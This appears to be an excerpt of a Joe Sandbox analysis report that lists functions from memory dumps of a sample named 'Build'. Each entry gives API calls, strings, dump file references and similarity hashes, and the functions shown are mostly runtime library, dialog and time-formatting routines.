Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
String ID: $%s:$CAPTION$d$t":
API String ID: 2407758923-2060924397
Opcode ID: bafffc1a11b73755f14db9b0793b3b44b90a162f49b2c66f083b664a4fc4c0d5
Instruction ID: 8f620e34f43e636860b2e2712ef1645ca6129ac7cfcad446de50ee4e25ec9a9c
Opcode Fuzzy Hash: bafffc1a11b73755f14db9b0793b3b44b90a162f49b2c66f083b664a4fc4c0d5
Instruction Fuzzy Hash: 8F81BD72108301AFD726DF68CE89E6FBBE8EB89704F04491DF988D7250D734E9088B52

Function 0038F172 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0038F1B6

Part of subcall function 0038ED51: _free.LIBCMT ref: 0038ED6E
Part of subcall function 0038ED51: _free.LIBCMT ref: 0038ED80
Part of subcall function 0038ED51: _free.LIBCMT ref: 0038ED92
Part of subcall function 0038ED51: _free.LIBCMT ref: 0038EDA4
Part of subcall function 0038ED51: _free.LIBCMT ref: 0038EDB6
Part of subcall function 0038ED51: _free.LIBCMT ref: 0038EDC8
Part of subcall function 0038ED51: _free.LIBCMT ref: 0038EDDA
Part of subcall function 0038ED51: _free.LIBCMT ref: 0038EDEC
Part of subcall function 0038ED51: _free.LIBCMT ref: 0038EDFE
Part of subcall function 0038ED51: _free.LIBCMT ref: 0038EE10
Part of subcall function 0038ED51: _free.LIBCMT ref: 0038EE22
Part of subcall function 0038ED51: _free.LIBCMT ref: 0038EE34
Part of subcall function 0038ED51: _free.LIBCMT ref: 0038EE46

_free.LIBCMT ref: 0038F1AB

Part of subcall function 0038BAFA: RtlFreeHeap.NTDLL(00000000,00000000,?,0038EEE6,?,00000000,?,00000000,?,0038EF0D,?,00000007,?,?,0038F30A,?), ref: 0038BB10
Part of subcall function 0038BAFA: GetLastError.KERNEL32(?,?,0038EEE6,?,00000000,?,00000000,?,0038EF0D,?,00000007,?,?,0038F30A,?,?), ref: 0038BB22

_free.LIBCMT ref: 0038F1CD
_free.LIBCMT ref: 0038F1E2
_free.LIBCMT ref: 0038F1ED
_free.LIBCMT ref: 0038F20F
_free.LIBCMT ref: 0038F222
_free.LIBCMT ref: 0038F230
_free.LIBCMT ref: 0038F23B
_free.LIBCMT ref: 0038F273
_free.LIBCMT ref: 0038F27A
_free.LIBCMT ref: 0038F297
_free.LIBCMT ref: 0038F2AF

Strings

h):, xrefs: 0038F25E

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID: h):
API String ID: 161543041-1003423187
Opcode ID: 5afb467d8f7b21b70bc8ce114bbf61c0f243fce2e522491cd1cfbe32f7eda5e9
Instruction ID: 1d7db8f8681ee4d3a7e6b63c52c1fcb86d3b7e6f2845a99abf8e3f8f430181f4
Opcode Fuzzy Hash: 5afb467d8f7b21b70bc8ce114bbf61c0f243fce2e522491cd1cfbe32f7eda5e9
Instruction Fuzzy Hash: D6315C35600702DFEB26FA79D845B96B3E9FF00310F2149A9E44ADB251DF75AD90CB10

Function 0037B631 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 126memoryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0037B656
_wcslen.LIBCMT ref: 0037B6F6
GlobalAlloc.KERNEL32(00000040,?), ref: 0037B705
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 0037B726

Strings

utf-8"></head>, xrefs: 0037B68B
</html>, xrefs: 0037B6D7
FjuK8, xrefs: 0037B74D
<head><meta http-equiv="content-type" content="text/html; charset=, xrefs: 0037B680
<html>, xrefs: 0037B675, 0037B6AE

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: _wcslen$AllocByteCharGlobalMultiWide
String ID: FjuK8$</html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
API String ID: 1116704506-1559201756
Opcode ID: eb6e8fb92629bfbc0e423d24a8de47fc58641371908d0a915ba75300a0ddd433
Instruction ID: e4f48f71730c2942f48f3fa43c6bf762dcce1782bf38564583a0615186a024c0
Opcode Fuzzy Hash: eb6e8fb92629bfbc0e423d24a8de47fc58641371908d0a915ba75300a0ddd433
Instruction Fuzzy Hash: 3B3124322083417BE72BBB309C06F6FB7AC9F81320F15411EF5059A1C2EB68990483A5

Function 0037F9EE Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 86windowCOMMON

Download Yara Rule

APIs

GetWindow.USER32(?,00000005), ref: 0037FA20
GetClassNameW.USER32(00000000,?,00000800), ref: 0037FA4C

Part of subcall function 00374168: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,000000FF,0036E084,00000000,.exe,?,?,00000800,?,?,?,0037AD5D), ref: 0037417E

GetWindowLongW.USER32(00000000,000000F0), ref: 0037FA68
SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0037FA7F
GetObjectW.GDI32(00000000,00000018,?), ref: 0037FA93
SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0037FABC
DeleteObject.GDI32(00000000), ref: 0037FAC3
GetWindow.USER32(00000000,00000002), ref: 0037FACC

Strings

STATIC, xrefs: 0037FA52

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
String ID: STATIC
API String ID: 3820355801-1882779555
Opcode ID: e3285a4c7148d8e14317bdfd26d906b392de7778a76b839de56b627a4e005d8a
Instruction ID: a50e3907e4158f1759ff2735157b03b843bf0ec4c359d11cbe5a2790d27479d8
Opcode Fuzzy Hash: e3285a4c7148d8e14317bdfd26d906b392de7778a76b839de56b627a4e005d8a
Instruction Fuzzy Hash: 012145325447107FE233AB348C4AFAF769CBF49710F058428FD49EA191DB78A9028FA1

Function 0038B8B1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0038B8C5

Part of subcall function 0038BAFA: RtlFreeHeap.NTDLL(00000000,00000000,?,0038EEE6,?,00000000,?,00000000,?,0038EF0D,?,00000007,?,?,0038F30A,?), ref: 0038BB10
Part of subcall function 0038BAFA: GetLastError.KERNEL32(?,?,0038EEE6,?,00000000,?,00000000,?,0038EF0D,?,00000007,?,?,0038F30A,?,?), ref: 0038BB22

_free.LIBCMT ref: 0038B8D1
_free.LIBCMT ref: 0038B8DC
_free.LIBCMT ref: 0038B8E7
_free.LIBCMT ref: 0038B8F2
_free.LIBCMT ref: 0038B8FD
_free.LIBCMT ref: 0038B908
_free.LIBCMT ref: 0038B913
_free.LIBCMT ref: 0038B91E
_free.LIBCMT ref: 0038B92C

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 777e898f0cf4576dad278ce2d725703644bbcd5bc1281d3ac44c2b257ff2e628
Instruction ID: a41cab630f1302d4f00a88a0d50e615772c621839e64c3338dd4374d0d6ed38a
Opcode Fuzzy Hash: 777e898f0cf4576dad278ce2d725703644bbcd5bc1281d3ac44c2b257ff2e628
Instruction Fuzzy Hash: 9A11A77A100249AFCB06FF59C992CD97BB5EF04350B0180A5FA094F232DB75EA51DB80

Function 00385451 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 00385570
___TypeMatch.LIBVCRUNTIME ref: 0038567E
_UnwindNestedFrames.LIBCMT ref: 003857D0
CallUnexpected.LIBVCRUNTIME ref: 003857EB
_abort.LIBCMT ref: 003857F0

Strings

csm, xrefs: 003854FB
csm, xrefs: 0038548E
csm, xrefs: 003855A7

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
String ID: csm$csm$csm
API String ID: 322700389-393685449
Opcode ID: ecdb5ed13377dcfbe4ced2e188ead3dc13cde1a43f4dee26c19c80ddbb3ff0f5
Instruction ID: 38662a73c8d888cbc1ee0cbf171ac265af3e53e02e953210bf0f4925bf1ed91b
Opcode Fuzzy Hash: ecdb5ed13377dcfbe4ced2e188ead3dc13cde1a43f4dee26c19c80ddbb3ff0f5
Instruction Fuzzy Hash: 19B17A71800B09EFCF26EFA4D8819AEBBB5FF14310B158599F8116B212D731DA51CF91

Function 0036CE64 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 202COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0036CE6B
VariantClear.OLEAUT32(?), ref: 0036D015

Strings

Windows 10, xrefs: 0036CFFB
f8, xrefs: 0036CE88
WQL, xrefs: 0036CF3E
ROOT\CIMV2, xrefs: 0036CE99
Name, xrefs: 0036CFE9
SELECT * FROM Win32_OperatingSystem, xrefs: 0036CF2C

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: ClearH_prolog3Variant
String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10$f8
API String ID: 3629354427-2844002443
Opcode ID: ea117ed9ae1073b99f50b7cac4a470a5231122441ab808c467e319637f718809
Instruction ID: 23147e11996aef87f2d207be8d3dc79b91e0a1deb8ed229998f7b9e23bbab3c2
Opcode Fuzzy Hash: ea117ed9ae1073b99f50b7cac4a470a5231122441ab808c467e319637f718809
Instruction Fuzzy Hash: 7B715770A10219AFDF16DFA4CC95DBEB7B9BF48710B144569F546EB2A0CB31AD02CB60

Function 00391CDD Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00392452,00000000,00000000,00000000,00000000,00000000,?), ref: 00391D1F
__fassign.LIBCMT ref: 00391D9A
__fassign.LIBCMT ref: 00391DB5
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00391DDB
WriteFile.KERNEL32(?,00000000,00000000,R$9,00000000,?,?,?,?,?,?,?,?,?,00392452,00000000), ref: 00391DFA
WriteFile.KERNEL32(?,00000000,00000001,R$9,00000000,?,?,?,?,?,?,?,?,?,00392452,00000000), ref: 00391E33

Strings

R$9, xrefs: 00391DEE, 00391E26, 00391DF1, 00391E29

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID: R$9
API String ID: 1324828854-1049905762
Opcode ID: a1bf5ce7494012d5f2cf88f3fcae76ffc970b51d8a57d1454af2fe90d78f3de9
Instruction ID: fe3fc501f3d9e5ba75b18cbf02936188e4bdac9a22a97a4a5798ffe5859ba348
Opcode Fuzzy Hash: a1bf5ce7494012d5f2cf88f3fcae76ffc970b51d8a57d1454af2fe90d78f3de9
Instruction Fuzzy Hash: 32514F71E0024AAFDF12CFA8D885AEEBBB8FF09300F15455AE955F7291D731A941CB60

Function 0037D8C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00361366: GetDlgItem.USER32(00000000,00003021), ref: 003613AA
Part of subcall function 00361366: SetWindowTextW.USER32(00000000,003965F4), ref: 003613C0

EndDialog.USER32(?,00000001), ref: 0037D910
SendMessageW.USER32(?,00000080,00000001,0002048D), ref: 0037D937
SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0037D950
SetWindowTextW.USER32(?,?), ref: 0037D961
GetDlgItem.USER32(?,00000065), ref: 0037D96A
SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0037D97E
SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0037D994

Strings

LICENSEDLG, xrefs: 0037D8D4

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: MessageSend$Item$TextWindow$Dialog
String ID: LICENSEDLG
API String ID: 3214253823-2177901306
Opcode ID: d79d2d560e48ac41e3f93894d8491092561e7cbad933b99a54c72b79728cbc58
Instruction ID: 732186f843a4f062611e8cb9fd10cde8b95947b249a4da6966414e2897e5fed7
Opcode Fuzzy Hash: d79d2d560e48ac41e3f93894d8491092561e7cbad933b99a54c72b79728cbc58
Instruction Fuzzy Hash: E2219C32204214BBD7236F25EC49E7B3B7CEB47B45F05C018FB04E65A0CB66A9009B71

Function 0036BF89 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0036BFA3

Part of subcall function 003734D7: GetSystemTime.KERNEL32(?,00000000), ref: 003734EF
Part of subcall function 003734D7: SystemTimeToFileTime.KERNEL32(?,?), ref: 003734FD

Part of subcall function 00373480: __aulldiv.LIBCMT ref: 00373489

__aulldiv.LIBCMT ref: 0036BFCF
GetCurrentProcessId.KERNEL32(00000000,?,000186A0,00000000,?,?,?,?), ref: 0036BFD6
_swprintf.LIBCMT ref: 0036C001

Part of subcall function 00364C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00364C13

_wcslen.LIBCMT ref: 0036C00B
_swprintf.LIBCMT ref: 0036C061
_wcslen.LIBCMT ref: 0036C06B

Strings

%u.%03u, xrefs: 0036BFF1, 0036C055

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: Time_wcslen$System__aulldiv_swprintf$CurrentFileProcess__vswprintf_c_l
String ID: %u.%03u
API String ID: 2956649372-1114938957
Opcode ID: e71c131ef755501bea06525c71e069f4aeb1de4e4cdc1e8097f074921f1a7003
Instruction ID: 866ada4f6bfab2975611e41004f05be3cccae4099eb058d463f315797aa156ac
Opcode Fuzzy Hash: e71c131ef755501bea06525c71e069f4aeb1de4e4cdc1e8097f074921f1a7003
Instruction Fuzzy Hash: 66218472A14340AFC626EF65CC86EAFB7DCEBC4740F40891EF489D7241DA35D90887A2

Function 0037CBC8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 78timeCOMMON

Download Yara Rule

APIs

FileTimeToSystemTime.KERNEL32(?,?), ref: 0037CBEE
SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 0037CC05
SystemTimeToFileTime.KERNEL32(?,?), ref: 0037CC19
FileTimeToSystemTime.KERNEL32(?,?), ref: 0037CC2A
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0037CC42
GetTimeFormatW.KERNEL32(00000400,?,?,00000000,00000000,00000032), ref: 0037CC66
_swprintf.LIBCMT ref: 0037CC85

Strings

%s %s, xrefs: 0037CC7C

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: Time$System$File$Format$DateLocalSpecific_swprintf
String ID: %s %s
API String ID: 385609497-2939940506
Opcode ID: 636f2a9dde15f5c8faa70763aa4867cbf4ccd67237750894bb1db593fee3408e
Instruction ID: 9bfb2bbfad5c9bcb2f78f85bedab04b465b6ca6118ec0948235ede9acf3537ed
Opcode Fuzzy Hash: 636f2a9dde15f5c8faa70763aa4867cbf4ccd67237750894bb1db593fee3408e
Instruction Fuzzy Hash: A9213BB290024CABDB22DFA1DD45EEF77BCEF09300F10456AFA09D7152E6319A05CB60

Function 00382360 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,0036CEA9,0036CEAB,00000000,00000000,92C77967,00000001,00000000,00000000,?,0036CD87,?,00000004,0036CEA9,ROOT\CIMV2), ref: 003823E9
MultiByteToWideChar.KERNEL32(00000000,00000000,0036CEA9,?,00000000,00000000,?,?,0036CD87,?,00000004,0036CEA9), ref: 00382464
SysAllocString.OLEAUT32(00000000), ref: 0038246F
_com_issue_error.COMSUPP ref: 00382498
_com_issue_error.COMSUPP ref: 003824A2
GetLastError.KERNEL32(80070057,92C77967,00000001,00000000,00000000,?,0036CD87,?,00000004,0036CEA9,ROOT\CIMV2), ref: 003824A7
_com_issue_error.COMSUPP ref: 003824BA
GetLastError.KERNEL32(00000000,?,0036CD87,?,00000004,0036CEA9,ROOT\CIMV2), ref: 003824D0
_com_issue_error.COMSUPP ref: 003824E3

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
String ID:
API String ID: 1353541977-0
Opcode ID: 76743ea0347ad6480a490f077dc5acc5efa2203ebfc8a5f25bd60d1dbe9761b4
Instruction ID: 91fbed308f57ff44d8b5ceaa87fe37a6bfd9194c906eb93d4d1feaf99df80732
Opcode Fuzzy Hash: 76743ea0347ad6480a490f077dc5acc5efa2203ebfc8a5f25bd60d1dbe9761b4
Instruction Fuzzy Hash: 05412875A00305ABDB12AF69DC46BAFBBA8EB48710F2042AAF505E7291D7759900C7B4

Function 0038C06A Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0038C0F5
__alldvrm.LIBCMT ref: 0038C2F6
__alldvrm.LIBCMT ref: 0038C318

Strings

=z8, xrefs: 0038C074
=z8, xrefs: 0038C080, 0038C0DB, 0038C0F4, 0038C27A
=z8, xrefs: 0038C2B7

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID: =z8$=z8$=z8
API String ID: 1036877536-2376782586
Opcode ID: d14ae59a6c47695d102f38ce8bebab2561187863f3de3b9f7c7780fcd14afeb7
Instruction ID: b65a7c2d47ef0010566d307c2e360e2f4c11f1e72b0637dce21efb499cb05399
Opcode Fuzzy Hash: d14ae59a6c47695d102f38ce8bebab2561187863f3de3b9f7c7780fcd14afeb7
Instruction Fuzzy Hash: E5A17B769203869FDB17EF68C8917AEBBE4EF11340F1941EDE4859B282C2788D42C770

Function 00384F20 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00384F57
___except_validate_context_record.LIBVCRUNTIME ref: 00384F5F
_ValidateLocalCookies.LIBCMT ref: 00384FE8
__IsNonwritableInCurrentImage.LIBCMT ref: 00385013
_ValidateLocalCookies.LIBCMT ref: 00385068

Strings

csm, xrefs: 00384FFD
M8, xrefs: 00385005, 0038500E, 0038501F

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
